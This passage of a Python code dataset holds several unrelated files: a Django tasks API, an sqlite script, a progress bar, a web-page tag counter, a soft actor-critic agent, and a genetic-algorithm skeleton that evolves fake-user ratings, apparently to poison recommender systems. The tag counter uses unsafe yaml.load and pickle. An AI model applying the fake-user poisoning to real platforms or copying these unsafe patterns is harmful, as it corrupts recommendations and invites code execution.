\n 'task': task_data.data,\n }\n \n elif method == 'change':\n if task_id is not None:\n try:\n task = CoreTasks.objects.get(id=int(task_id))\n if description is not None:\n task.tasks_description = description\n if completed is not None:\n if completed is True:\n task.date_completed = datetime.now()\n elif completed is False:\n task.date_completed = None\n if due_date is not None:\n task.date_due = convert_timezone_reverse(datetime.strptime(due_date, '%m/%d/%Y'), request.user) \n \n task.save()\n task_data = TaskSerializer(task, context={'request': request})\n response = response_profile_save_successful()\n # if there's any exception then just send None data.\n except:\n \n response = response_profile_save_successful()\n \n raise ExceptionUnknownError(detail=response)\n \n # finalizing our output content.\n content = { # sending success response\n 'status': 'success',\n 'response': response,\n 'task': task_data.data,\n }\n elif method == 'delete':\n if task_id is not None:\n try:\n task = CoreTasks.objects.get(id=int(task_id))\n task.date_deativated = datetime.now()\n task.deactivateduser = request.user\n task.save()\n except:\n raise ExceptionUnknownError(detail=response)\n \n content = {'status': 'success',\n 'response': 'Tasks is deactivated'\n }\n \n elif method == 'clear_all_completed':\n tasks = CoreTasks.objects.filter(user=request.user, date_deativated=None, task_cleared_id=0).exclude(date_completed=None)\n for task in tasks:\n task.task_cleared_id = 1\n task.save()\n \n content = {'status': 'success',\n 'response': 'All completed tasks is cleared'\n }\n \n \n elif method == 'mark_all_as_done': \n if completed is not None: \n if completed is True: \n tasks = CoreTasks.objects.filter(user=request.user, date_deativated=None, task_cleared_id=0, date_completed=None)\n for task in tasks:\n task.date_completed = datetime.now()\n task.save()\n else:\n tasks = CoreTasks.objects.filter(user=request.user, date_deativated=None, task_cleared_id=0)\n for task in tasks:\n task.date_completed = None\n task.save()\n \n content = {'status': 'success',\n 'response': 'All completed marked as done!'\n } \n else:\n content = {'status': 'fail',\n 'response': 'Alert ID should be defined!'\n }\n \n # sending final response.\n return Response(content)","sub_path":"apps/api/v1/tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"320588788","text":"import sqlite3\nimport csv\n\nwith sqlite3.connect(\"new.db\") as connection:\n\n c = connection.cursor()\n\n cities = [\n ('Boston', 'MA', 600000),\n ('Chicago','IN', 27000000),\n ('Houston', 'TX', 21000000),\n ('Phoenix', 'AZ', 15000000)\n ]\n c.executemany('INSERT INTO population VALUES(?,?,?)', cities)\n\nwith sqlite3.connect(\"new.db\") as connection:\n c = connection.cursor()\n employees = csv.reader(open('employees.csv', 'rU'))\n c.execute(\"DROP TABLE employees\")\n c.execute(\"CREATE TABLE employees (firstname TEXT, lastname TEXT)\")\n c.executemany(\"INSERT INTO employees(firstname, lastname) values (?,?)\", employees)\n","sub_path":"02_sql.py","file_name":"02_sql.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"316358404","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nclass ProgressBar:\r\n\tdef __init__(self, min = 0, max = 100, width = 60, charset = '[=]'):\r\n\t\tself.min = min\r\n\t\tself.max = max\r\n\t\tself.width = width\r\n\t\tself.current = min\r\n\t\tself.percent = 0.0\r\n\t\tself.int_percent = 0\r\n\r\n\t\tif len(charset) != 3: charset = '[=]'\r\n\t\tself.charset = charset\r\n\r\n\t\tself.bar = ''\r\n\t\tself.used = -1\r\n\t\tself.int_percent_change = False\r\n\r\n\tdef update(self, current):\r\n\t\tself.current = current\r\n\t\tself.percent = (float(self.current-self.min)/(self.max-self.min))*100.0\r\n\t\tint_percent = int(self.percent)\r\n\r\n\t\tif int_percent != self.int_percent:\r\n\t\t\tself.int_percent_change = True\r\n\t\tself.int_percent = int_percent\r\n\r\n\t\tself.__generate_bar__()\r\n\r\n\t\tif self.int_percent_change:\r\n\t\t\tself.int_percent_change = False\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\r\n\tdef __str__(self):\r\n\t\treturn self.bar\r\n\r\n\tdef __generate_bar__(self):\r\n\t\tself.used = int((float(self.current-self.min)/(self.max-self.min)) * (self.width-6))\r\n\t\t#if new_used != self.used:\r\n\t\t#\tself.used = new_used\r\n\t\t#\tself.bar_change = True\r\n\r\n\t\tcenter = self.charset[1] * self.used\r\n\t\t#center = center.ljust(self.width-2)\r\n\t\t#center = center[:(self.width-2)/2-2] + str(int(self.percent)) + '%' + center[(self.width-2)/2+2:]\r\n\t\tself.bar = self.charset[0] + center + self.charset[2] + \" \" + str(self.int_percent) + '%' + '\\r'\r\n\r\ndef main():\r\n\tpass\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","sub_path":"P2/ProgressBar.py","file_name":"ProgressBar.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"340208941","text":"import numpy as np\nimport uuid\n\n\nclass AttackAgent:\n def __init__(self, n_m_users=0, n_items=0, gnome=None, d_birth=0, POS_RATIO=1, BINARY = True):\n if gnome is not None and ( n_items != 0 or n_items != 0 or d_birth == 0 or POS_RATIO != 1):\n raise ValueError('not valid config')\n self.fitness = .0\n # self.is_fame = False\n self.evaluted = False\n self.d_birth = d_birth\n # changing params through generations\n self.age = 0 # at what generation this agent created?\n self.generations_mutated = 0\n self.id = uuid.uuid4().hex[:8]\n # initiate or create one from given gnome (offspring)\n if gnome is None:\n if BINARY:\n self.gnome = np.random.choice([0, 1],\n size=(n_m_users, n_items),\n p=[1 - POS_RATIO, POS_RATIO])\n else:\n self.gnome = np.random.choice(list(range(6)),\n size=(n_m_users, n_items),\n p=[1-POS_RATIO, POS_RATIO / 5, POS_RATIO / 5, POS_RATIO / 5, POS_RATIO / 5, POS_RATIO / 5])\n else:\n self.gnome = gnome\n\nclass FakeUserGeneticAlgorithm:\n def __init__(self, POP_SIZE, N_GENERATIONS, GENERATIONS_BEFORE_REMOVAL, REMOVE_PERCENTILE, MUTATE_USER_PROB, MUTATE_BIT_PROB, BINARY, POS_RATIO):\n self.POP_SIZE = POP_SIZE\n self.N_GENERATIONS = N_GENERATIONS\n self.GENERATIONS_BEFORE_REMOVAL = GENERATIONS_BEFORE_REMOVAL\n self.REMOVE_PERCENTILE = REMOVE_PERCENTILE\n self.MUTATE_USER_PROB = MUTATE_USER_PROB\n self.MUTATE_BIT_PROB = MUTATE_BIT_PROB\n self.BINARY = BINARY\n self.POS_RATIO = POS_RATIO\n\n def init_agents(self, n_m_users, n_items):\n return [AttackAgent(n_m_users, n_items, POS_RATIO=self.POS_RATIO, BINARY=self.BINARY) for _ in range(self.POP_SIZE)]\n\n\n def fitness(self, agents):\n\n for agent in agents:\n if not agent.evaluted:\n agent.fitness = sum(sum(agent.gnome))\n # train model with this new malicious data\n # eval model\n # continue training until there is no improvment\n # take best model, calulate difference in best model and pert_best model\n # return it as fitness\n return agents\n\n \"\"\"\n Sorts the pool, removes old indviduals that are over GENERATIONS_BEFORE_REMOVAL and are worse than REMOVE_PERCENTILE in score\n \"\"\"\n\n # TODO: there is a case where the pool can get too large, think about it.\n def selection(self, agents):\n # update age\n for agent in agents:\n agent.age += 1\n # sort by fitness best to worse\n agents = sorted(agents, key=lambda x: x.fitness, reverse=True)\n # get 5% worst\n fitness_treshold = agents[int((1-self.REMOVE_PERCENTILE) * len(agents))].fitness\n # agents_removed_worst = [a for a in agents if a.fitness > fitness_treshold and curr_generation - a.d_birth < GENERATIONS_BEFORE_REMOVAL]\n\n remove_func = lambda x: x.age < self.GENERATIONS_BEFORE_REMOVAL or x.fitness < fitness_treshold\n\n agents_removed_worst = list(filter(remove_func, agents))\n return agents_removed_worst\n\n # sort by fitness, take 2 best agents\n # keep best one in pool\n\n # TODO: Extend cross-over between pairs\n def crossover(self, agents, cur_generation):\n # Simple Cross-over between 2 agents, creates 2 offsprings.\n # or even create cross between multiple agents\n # Improve this to have a tournement like.\n agent_1_part_prefix = agents[0].gnome[:agents[0].gnome.shape[0]//2]\n agent_1_part_postfix = agents[0].gnome[agents[0].gnome.shape[0] // 2:]\n agent_2_part_prefix = agents[1].gnome[:agents[1].gnome.shape[0]//2]\n agent_2_part_postfix = agents[1].gnome[agents[1].gnome.shape[0] // 2:]\n offspring_1 = np.concatenate([agent_1_part_prefix, agent_2_part_postfix])\n offspring_2 = np.concatenate([agent_2_part_prefix, agent_1_part_postfix])\n offspring_1 = AttackAgent(gnome=offspring_1, d_birth= cur_generation)\n offspring_2 = AttackAgent(gnome=offspring_2, d_birth= cur_generation)\n\n # add offsprints and remove worst\n agents.append(offspring_1)\n agents.append(offspring_2)\n return agents\n # return offspring_1, offspring_2\n\n # Make 2 offsprings from 2 best agents\n # the cross over will take bunch of users from each attack, and mix them up together,\n # the cross over will not change the ratings themselvs, only the rows.\n# # make also with the hall of fame\n\n\n\n def mutation(self, agents):\n # mutation utility functions\n def bit_flip_func_binary(x):\n # bits = [1, 0]\n if np.random.rand() < self.MUTATE_BIT_PROB:\n if x == 0:\n return 1\n else:\n return 0\n else:\n return x\n\n def bit_flip_func_non_binary(x):\n if np.random.rand() < self.MUTATE_BIT_PROB:\n return np.random.randint(1, 6)\n else:\n return x\n\n def flip_bit_1d_array(arr):\n if self.BINARY:\n return list(map(bit_flip_func_binary, arr))\n else:\n return list(map(bit_flip_func_non_binary, arr))\n for agent in agents:\n if np.random.rand() < self.MUTATE_USER_PROB:\n agent.gnome = np.apply_along_axis(func1d=flip_bit_1d_array, axis=0, arr=agent.gnome)\n agent.generations_mutated += 1\n # flip bit in an entry in a prob\n # this will work on every entry, to create stohastic behaviour, kind of epsilon greedy method.\n return agents\n\n def get_stats(self, agents):\n # Gather all the fitnesses in one list and print the stats\n fits = [ind.fitness for ind in agents]\n\n length = len(agents)\n mean = sum(fits) / length\n sum2 = sum(x * x for x in fits)\n std = abs(sum2 / length - mean ** 2) ** 0.5\n return length, min(fits), max(fits), mean, std\n # print(f\"G:{cur_generation}\\tp_size:{length}\\tmin:{min(fits):.2f}\\tmax:{max(fits):.2f}\\tavg:{mean:.2f}\\tstd:{std:.2f}\")\n # print(f\"Best agent index: {np.argmax(fits)}\")\n\n# TODO: When called from outside, still these parameters are used, need to find a way to change these\n# TODO: need those parameters from lambda functions.\n\n\n\n\ndef main():\n # HYPER-PARAMETERS\n POP_SIZE = 100\n N_GENERATIONS = 1000\n # Mutation\n MUTATE_USER_PROB = 0.2 # prob for choosing an individual\n MUTATE_BIT_PROB = 0.01 # prob for flipping a bit\n # Selection\n GENERATIONS_BEFORE_REMOVAL = 50\n REMOVE_PERCENTILE = 0.05 # remove only worst 5%\n\n # Model / Dataset related\n N_FAKE_USERS = 9\n N_ITEMS = 7\n BINARY = False # binary or non binary data\n POS_RATIO = 0.1 # Ratio pos/ neg ratio one percent from each user\n\n print(AttackAgent(N_FAKE_USERS, N_ITEMS).gnome)\n ga = FakeUserGeneticAlgorithm(POP_SIZE, N_GENERATIONS, GENERATIONS_BEFORE_REMOVAL, REMOVE_PERCENTILE, MUTATE_USER_PROB, MUTATE_BIT_PROB, BINARY, POS_RATIO)\n\n agents = ga.init_agents(N_FAKE_USERS, N_ITEMS)\n\n print('created n_agents', len(agents))\n ga.print_stats(agents, 0)\n for cur_generation in range(1, N_GENERATIONS):\n agents = ga.fitness(agents)\n if cur_generation % 50 == 0:\n ga.print_stats(agents , cur_generation)\n\n agents = ga.selection(agents)\n agents = ga.crossover(agents, cur_generation)\n agents = ga.mutation(agents)\n\n\n\n\n\n\n\n# pop = [agent for agent in ]\n\nif __name__ == '__main__':\n main()","sub_path":"ga.py","file_name":"ga.py","file_ext":"py","file_size_in_byte":7753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"613157686","text":"#!/usr/bin/python3\nimport pycurl, sys, os, time, yaml, argparse, sqlite3, pickle\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom io import BytesIO\nfrom bs4 import BeautifulSoup as BS\nfrom tabulate import tabulate as tb\n\nclass GetResponse:\n \"\"\"\n This class help you to get source code of any Web-page\n Use:\n GetResponse.encoding(value) - to change encoding for decoding HTML page\n GetResponse.get() - to get source code of Web-page\n \"\"\"\n def __init__(self, url):\n self.url = url\n self.buffer = BytesIO()\n self.enc = 'iso-8859-1'\n print('Inspected URL: {}'.format(self.url))\n def encoding(self, enc):\n self.enc = enc\n return self.enc\n def get(self):\n print('Encoding: {}'.format(self.enc))\n c = pycurl.Curl()\n c.setopt(c.URL, self.url)\n c.setopt(c.FOLLOWLOCATION, True)\n c.setopt(c.WRITEDATA, self.buffer)\n c.perform()\n c.close()\n self.body = self.buffer.getvalue()\n\nclass DB:\n \"\"\"\n This class uses for operations with sqlite3 database\n Use:\n DB.insert(site, url, tags) - to add the records to DB\n DB.select(site) - to get info about site from DB\n \"\"\"\n def __init__(self, dbname='db'):\n self.dbname = dbname\n self.table = 'taginfo'\n self.con = sqlite3.connect(self.dbname)\n self.cur = self.con.cursor()\n def insert(self, site, url, tags):\n self.cur.execute(\n \"\"\"\n create table if not exists {} (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n site CHAR,\n url TEXT,\n tags TEXT,\n timestamp DATETIME DEFAULT CURRENT_TIMESTAMP)\n \"\"\".format(self.table)\n )\n ptags = pickle.dumps(tags)\n v = (site, url, ptags,)\n self.cur.execute(\n \"\"\"\n insert into {} (site, url, tags) values (?, ?, ?)\n \"\"\".format(self.table), v\n )\n self.con.commit()\n return self.cur\n def select(self, site):\n self.cur.execute(\n \"\"\"\n select site,url,tags, timestamp from {} where site=? limit 1\n \"\"\".format(self.table), (site,)\n )\n res = self.cur.fetchall()\n if res:\n for row in res:\n l = list(row)\n l[2] = pickle.loads(l[2])\n print(l)\n info=l\n else:\n message = \"Sorry, but record for {} site is absent in the database\".format(site)\n print(message)\n info = message\n return info\n def last(self, number):\n last = self.cur.execute(\n \"\"\"\n select site from {} order by id desc limit {}\n \"\"\".format(self.table, number)\n )\n res = []\n for row in last:\n res.append(row[0])\n return res\n def close(self):\n self.cur.close()\n self.con.close()\n\ndef counter(html):\n tags = []\n res = {}\n soup = BS(html, 'html.parser')\n for tag in soup.findAll():\n tags.append(tag.name)\n uniq = list(set(tags))\n for tag in uniq:\n res[tag] = tags.count(tag)\n sort=sorted(res.items(), key=lambda x:(x[1],x[0]))\n restb=tb(sort, headers=['Tags', 'Numbers'], tablefmt='psql')\n print(restb)\n return res, restb\n\ndef log(url, lpath='logs'):\n if not os.path.exists(lpath):\n os.makedirs(lpath)\n with open('{}/{}'.format(lpath, 'access.log'), 'a+') as file:\n file.write('{} {}\\n'.format(time.strftime('%Y-%m-%d %H:%M:%S'), url))\n\ndef check_syn(yfile, syn):\n try:\n with open(yfile, 'r') as stream:\n allsyn = yaml.load(stream)\n try:\n synurl = allsyn[syn]\n return synurl, syn\n except:\n return syn, None\n except IOError:\n print(\"File {} doesn't exist! \\nUse --synfile option to specify other synonyms file\".format(yfile))\n sys.exit(1)\n\n\ndef download(url, synfile, enc, tktext=None, st=None, visual=False):\n print(enc)\n try:\n url, orig_syn = check_syn(synfile, url)\n response = GetResponse(url)\n if enc:\n response.encoding(enc)\n encod = response.enc\n response.get()\n tags, tagstb = counter(response.body)\n log(url)\n db = DB()\n if orig_syn:\n db.insert(orig_syn, url, tags)\n else:\n db.insert(url, url, tags)\n db.close()\n except BaseException as error:\n tagstb = error\n if visual:\n tktext.delete('1.0', END)\n tktext.insert(END, tagstb)\n st[\"text\"] = \"Enc: \" + encod\n\ndef view(vurl, synfile, tktext=None, visual=False):\n try:\n url, orig_syn = check_syn(synfile, vurl)\n db = DB()\n if orig_syn:\n res = db.select(orig_syn)\n db.close()\n else:\n res = db.select(url)\n db.close()\n except BaseException as error:\n res = error\n if visual:\n tktext.delete('1.0', END)\n tktext.insert(END, res)\n\ndef visual(title, synfile, enc):\n text = 'None'\n win = Tk()\n win.title(title)\n # \"Enter the website\" section\n textFrame = Frame(win)\n entryLabel = Label(textFrame)\n entryLabel[\"text\"] = \"Enter the website:\"\n entryLabel.grid(row=0, column=0, padx=2, pady=2)\n entryWidget = Entry(textFrame)\n entryWidget[\"width\"] = 21\n entryWidget.grid(row=0, column=1, padx=2, pady=2)\n textFrame.grid(row=0, column=0, columnspan=2, sticky=N+S+E+W)\n\n #Scrollbar and test field\n scroll = Scrollbar(win)\n text = Text(win, height=20, width=40)\n scroll.grid(row=3, column=3, sticky=N+S+E+W)\n text.grid(row=3, column=0, columnspan=2)\n scroll.config(command=text.yview)\n text.config(yscrollcommand=scroll.set)\n\n # Status bar\n stLabel = Label(win)\n stLabel[\"text\"] = \"Krasheninnikov, 2016\"\n stLabel.grid(row=4, column=0, columnspan=2)\n\n # Buttons for dowloads and shows from db\n down = Button(win, text=\"Download\")\n down.grid(row=1, column=0, padx=2, pady=2, sticky=N+S+E+W)\n down[\"command\"] = lambda: download(entryWidget.get(), synfile, enc, text, stLabel, True)\n showfromdb = Button(win, text=\"Show from DB\")\n showfromdb.grid(row=1, column=1, padx=2, pady=2, sticky=N+S+E+W)\n showfromdb[\"command\"] = lambda: view(entryWidget.get(), synfile, text, True)\n\n #Combobox\n db = DB()\n list1 = db.last(5)\n db.close()\n combobox = Combobox(win, values = list1, state='readonly', style='TButton', justify='center')\n combobox.set(list1[0]) # Пункт по умолчанию\n combobox.grid(row=2, column=1, padx=2, pady=2, sticky=N+S+E+W)\n choice = Button(win, text=\"Select\") # создаём кнопку\n choice[\"command\"] = lambda: download(combobox.get(), synfile, enc, text, stLabel, True)\n choice.grid(row=2, column=0, padx=2, pady=2, sticky=N+S+E+W)\n\n win.mainloop()\n\ndef main():\n parser = argparse.ArgumentParser(description='This program inspect a Web-page \\\n and returt the number of tags')\n parser.add_argument('-g', '--get', dest='url', default=None, type=str,\n help='URL for inspecting')\n parser.add_argument('-v', '--view', dest='vurl', type=str,\n help='URL for extracting information from DB')\n parser.add_argument('-e', '--enc', default=None, type=str,\n help='Encoding for inspecting URL')\n parser.add_argument('-s', '--synfile', default='synonyms.yaml', type=str,\n help='Path for file with synonyms')\n parser.add_argument('--version', action='version', version='%(prog)s 1.0')\n args = parser.parse_args()\n\n if args.url:\n download(args.url, args.synfile, args.enc)\n elif args.vurl:\n view(args.vurl, args.synfile)\n else:\n visual('TagCounter v1.0', args.synfile, args.enc)\n\nif __name__ == '__main__':\n main()\n","sub_path":"tagcounter.py","file_name":"tagcounter.py","file_ext":"py","file_size_in_byte":8141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"269024398","text":"# from DDPG import DDPG, CriticNetwork\nfrom ReplayBuffer import ReplayBuffer\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport random\nimport math\n\ndef calculate_log_pi(log_stds, noises, actions):\n \"\"\" 確率論的な行動の確率密度を返す. \"\"\"\n # ガウス分布 `N(0, stds * I)` における `noises * stds` の確率密度の対数(= \\log \\pi(u|a))を計算する.\n # (torch.distributions.Normalを使うと無駄な計算が生じるので,下記では直接計算しています.)\n gaussian_log_probs = \\\n (-0.5 * noises.pow(2) - log_stds).sum(dim=-1, keepdim=True) - 0.5 * math.log(2 * math.pi) * log_stds.size(-1)\n\n # tanh による確率密度の変化を修正する.\n log_pis = gaussian_log_probs - torch.log(1 - actions.pow(2) + 1e-6).sum(dim=-1, keepdim=True)\n\n return log_pis\n\n\ndef reparameterize(means, log_stds):\n \"\"\" Reparameterization Trickを用いて,確率論的な行動とその確率密度を返す. \"\"\"\n # 標準偏差.\n stds = log_stds.exp()\n # 標準ガウス分布から,ノイズをサンプリングする.\n noises = torch.randn_like(means)\n # Reparameterization Trickを用いて,N(means, stds)からのサンプルを計算する.\n us = means + noises * stds\n # tanh を適用し,確率論的な行動を計算する.\n actions = torch.tanh(us)\n\n # 確率論的な行動の確率密度の対数を計算する.\n log_pis = calculate_log_pi(log_stds, noises, actions)\n\n return actions, log_pis\n\n\ndef atanh(x):\n \"\"\" tanh の逆関数. \"\"\"\n return 0.5 * (torch.log(1 + x + 1e-6) - torch.log(1 - x + 1e-6))\n\n\nclass ActorNetwork(nn.Module):\n def __init__(self, state_size, action_size, hidden_size=64):\n super().__init__()\n\n self.net = nn.Sequential(\n nn.Linear(state_size, hidden_size),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_size, 2*action_size),\n )\n\n def forward(self, states):\n return torch.tanh(self.net(states).chunk(2, dim=-1)[0])\n\n def sample(self, states):\n means, log_stds = self.net(states).chunk(2, dim=-1)\n return reparameterize(means, log_stds.clamp(-20, 2))\n\nclass CriticNetwork(nn.Module):\n def __init__(self, state_size, action_size, hidden_size=64):\n super().__init__()\n\n self.net1 = nn.Sequential(\n nn.Linear(state_size + action_size, hidden_size),\n nn.ELU(inplace=True),\n nn.Linear(hidden_size, hidden_size),\n nn.ELU(inplace=True),\n nn.Linear(hidden_size, 1),\n )\n self.net2 = nn.Sequential(\n nn.Linear(state_size + action_size, hidden_size),\n nn.ELU(inplace=True),\n nn.Linear(hidden_size, hidden_size),\n nn.ELU(inplace=True),\n nn.Linear(hidden_size, 1),\n )\n\n def forward(self, states, actions):\n x = torch.cat([states, actions], dim=-1)\n return self.net1(x), self.net2(x)\n\nclass GC_SAC():\n\n def __init__(self, state_size, velocity_size, observation_size, action_size, goal_size, hidden_size=64, device=torch.device('cuda' if torch.cuda.is_available() else 'cpu'),\n batch_size=256, gamma=0.99, lr=3e-4,\n replay_size=10**6, start_steps=10**4, tau=5e-3, alpha=0.2, reward_scale=1.0, epsilon_decay = 50000,\n automatic_entropy_tuning=True):\n\n self.name = 'GC_SAC'\n\n self.buffer = ReplayBuffer(\n buffer_size=replay_size,\n state_size=state_size,\n velocity_size=velocity_size,\n observation_size=observation_size,\n action_size=action_size,\n goal_size=goal_size,\n device=device\n )\n \n # Actor-Criticのネットワークを構築する.\n self.actor = ActorNetwork(\n state_size=state_size[0]+velocity_size[0]+observation_size[0]+goal_size[0],\n action_size=action_size[0],\n hidden_size=hidden_size\n ).to(device)\n self.critic = CriticNetwork(\n state_size=state_size[0]+velocity_size[0]+observation_size[0]+goal_size[0],\n action_size=action_size[0],\n hidden_size=hidden_size\n ).to(device)\n self.critic_target = CriticNetwork(\n state_size=state_size[0]+velocity_size[0]+observation_size[0]+goal_size[0],\n action_size=action_size[0],\n hidden_size=hidden_size\n ).to(device).eval()\n\n # ターゲットネットワークの重みを初期化し,勾配計算を無効にする.\n self.critic_target.load_state_dict(self.critic.state_dict())\n for param in self.critic_target.parameters():\n param.requires_grad = False\n\n # オプティマイザ.\n self.optim_actor = torch.optim.Adam(self.actor.parameters(), lr=lr)\n self.optim_critic = torch.optim.Adam(self.critic.parameters(), lr=lr)\n\n self.device = device\n\n # その他パラメータ.\n self.action_size = action_size\n self.learning_steps = 0\n self.batch_size = batch_size\n self.device = device\n self.gamma = gamma\n self.start_steps = start_steps\n self.tau = tau\n self.alpha = alpha\n self.reward_scale = reward_scale\n\n self.automatic_entropy_tuning = automatic_entropy_tuning\n\n if self.automatic_entropy_tuning:\n self.target_entropy = -torch.prod(torch.Tensor(action_size[0]).to(self.device)).item()\n self.log_alpha = torch.zeros(1, requires_grad=True, device=self.device)\n self.alpha_optim = torch.optim.Adam([self.log_alpha], lr=lr)\n \n def is_update(self, steps):\n # 学習初期の一定期間(start_steps)は学習しない.\n return steps >= max(self.start_steps, self.batch_size)\n\n def explore(self, obs_all, goal, state):\n \"\"\" 確率論的な行動と,その行動の確率密度の対数 \\log(\\pi(a|s)) を返す. \"\"\"\n _obs_all = np.concatenate(obs_all)\n\n # state_input = torch.tensor(np.concatenate([obs_all, goal]), dtype=torch.float, device=self.device).unsqueeze_(0)\n state_input = torch.tensor(np.concatenate([_obs_all, goal-state]), dtype=torch.float, device=self.device).unsqueeze_(0)\n with torch.no_grad():\n action, log_pi = self.actor.sample(state_input)\n return action.cpu().numpy()[0], log_pi.item()\n\n def exploit(self, obs_all, goal, state):\n \"\"\" 決定論的な行動を返す. \"\"\"\n _obs_all = np.concatenate(obs_all)\n\n # state_input = torch.tensor(np.concatenate([obs_all, goal]), dtype=torch.float, device=self.device).unsqueeze_(0)\n state_input = torch.tensor(np.concatenate([_obs_all, goal-state]), dtype=torch.float, device=self.device).unsqueeze_(0)\n with torch.no_grad():\n action = self.actor(state_input)\n return action.cpu().numpy()[0]\n\n def step(self, env, obs_all, goal, t, steps):\n t += 1\n\n state, velocity, observe = obs_all\n\n # 学習初期の一定期間(start_steps)は,ランダムに行動して多様なデータの収集を促進する.\n if steps <= self.start_steps:\n action = env.action_space.sample()\n else:\n action, _ = self.explore(obs_all, goal, state)\n\n next_obs_all, reward, done, _ = env.step(action)\n\n # ゲームオーバーではなく,最大ステップ数に到達したことでエピソードが終了した場合は,\n # 本来であればその先も試行が継続するはず.よって,終了シグナルをFalseにする.\n # NOTE: ゲームオーバーによってエピソード終了した場合には, done_masked=True が適切.\n # しかし,以下の実装では,\"たまたま\"最大ステップ数でゲームオーバーとなった場合には,\n # done_masked=False になってしまう.\n # その場合は稀で,多くの実装ではその誤差を無視しているので,今回も無視する.\n if t == env._max_episode_steps:\n done_masked = False\n else:\n done_masked = done\n\n next_state, next_velocity, next_observe = next_obs_all\n\n # リプレイバッファにデータを追加する.\n self.buffer.append(\n state, velocity, observe,\n action, reward, done_masked, \n next_state, next_velocity, next_observe, \n goal\n )\n\n # エピソードが終了した場合には,環境をリセットする.\n if done:\n t = 0\n next_obs_all = env.reset()\n\n return next_obs_all, t\n\n def update(self):\n self.learning_steps += 1\n \n states, velocitys, observations, actions, rewards, dones, next_states, next_velocitys, next_observations, goals = self.buffer.sample(self.batch_size)\n # states, actions, rewards, dones, collisions, next_states, goals = self.buffer.sample(self.batch_size)\n\n obs_alls = torch.cat([states, velocitys, observations], dim=-1)\n next_obs_alls = torch.cat([next_states, next_velocitys, next_observations], dim=-1)\n\n states2 = torch.cat([obs_alls, goals-states], dim=-1)\n next_states2 = torch.cat([next_obs_alls, goals-next_states], dim=-1)\n\n self.update_critic(states2, next_states2, obs_alls, actions, rewards, dones, next_obs_alls, goals, states, next_states)\n self.update_actor(states2, obs_alls, goals, states)\n self.update_target()\n\n def update_critic(self, states2, next_states2, obs_alls, actions, rewards, dones, next_obs_alls, goals, states, next_states):\n # states2 = torch.cat([states, goals], dim=-1)\n # states2 = torch.cat([obs_alls, goals-states], dim=-1)\n curr_qs1, curr_qs2 = self.critic(states2, actions)\n\n with torch.no_grad():\n # next_states2 = torch.cat([next_states, goals], dim=-1)\n # next_states2 = torch.cat([next_obs_alls, goals-next_states], dim=-1)\n next_actions, log_pis = self.actor.sample(next_states2)\n next_qs1, next_qs2 = self.critic_target(next_states2, next_actions)\n next_qs = torch.min(next_qs1, next_qs2) - self.alpha * log_pis\n target_qs = rewards * self.reward_scale + (1.0 - dones) * self.gamma * next_qs\n\n loss_critic1 = (curr_qs1 - target_qs).pow_(2).mean()\n loss_critic2 = (curr_qs2 - target_qs).pow_(2).mean()\n\n self.optim_critic.zero_grad()\n (loss_critic1 + loss_critic2).backward(retain_graph=False)\n self.optim_critic.step()\n\n def update_actor(self, states2, obs_alls, goals, states):\n # states2 = torch.cat([states, goals], dim=-1)\n # states2 = torch.cat([obs_alls, goals-states], dim=-1)\n actions, log_pis = self.actor.sample(states2)\n qs1, qs2 = self.critic(states2, actions)\n loss_actor = (self.alpha * log_pis - torch.min(qs1, qs2)).mean()\n\n self.optim_actor.zero_grad()\n loss_actor.backward(retain_graph=False)\n self.optim_actor.step()\n\n if self.automatic_entropy_tuning:\n alpha_loss = -(self.log_alpha * (log_pis + self.target_entropy).detach()).mean()\n\n self.alpha_optim.zero_grad()\n alpha_loss.backward()\n self.alpha_optim.step()\n\n self.alpha = self.log_alpha.exp()\n\n def update_target(self):\n for t, s in zip(self.critic_target.parameters(), self.critic.parameters()):\n t.data.mul_(1.0 - self.tau)\n t.data.add_(self.tau * s.data)\n\n def save(self, path=\"./\"):\n torch.save(self.actor.to('cpu').state_dict(), path+\"GC_SAC_HER_actor.pth\")\n self.actor.to(self.device)\n\n torch.save(self.critic.to('cpu').state_dict(), path+\"GC_SAC_HER_critic.pth\")\n self.critic.to(self.device)\n\n def load(self, path=\"./\"):\n self.actor.load_state_dict(torch.load(path+\"GC_SAC_HER_actor.pth\"))\n self.critic.load_state_dict(torch.load(path+\"GC_SAC_HER_critic.pth\"))\n\n'''\n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\nstate_t と state_t+1 のそれぞれに対して goal を concat するのが下位層だと面倒なので上位層(Bufferくらい)でconcatしたい\n\n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n'''","sub_path":"GC_SAC.py","file_name":"GC_SAC.py","file_ext":"py","file_size_in_byte":12455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
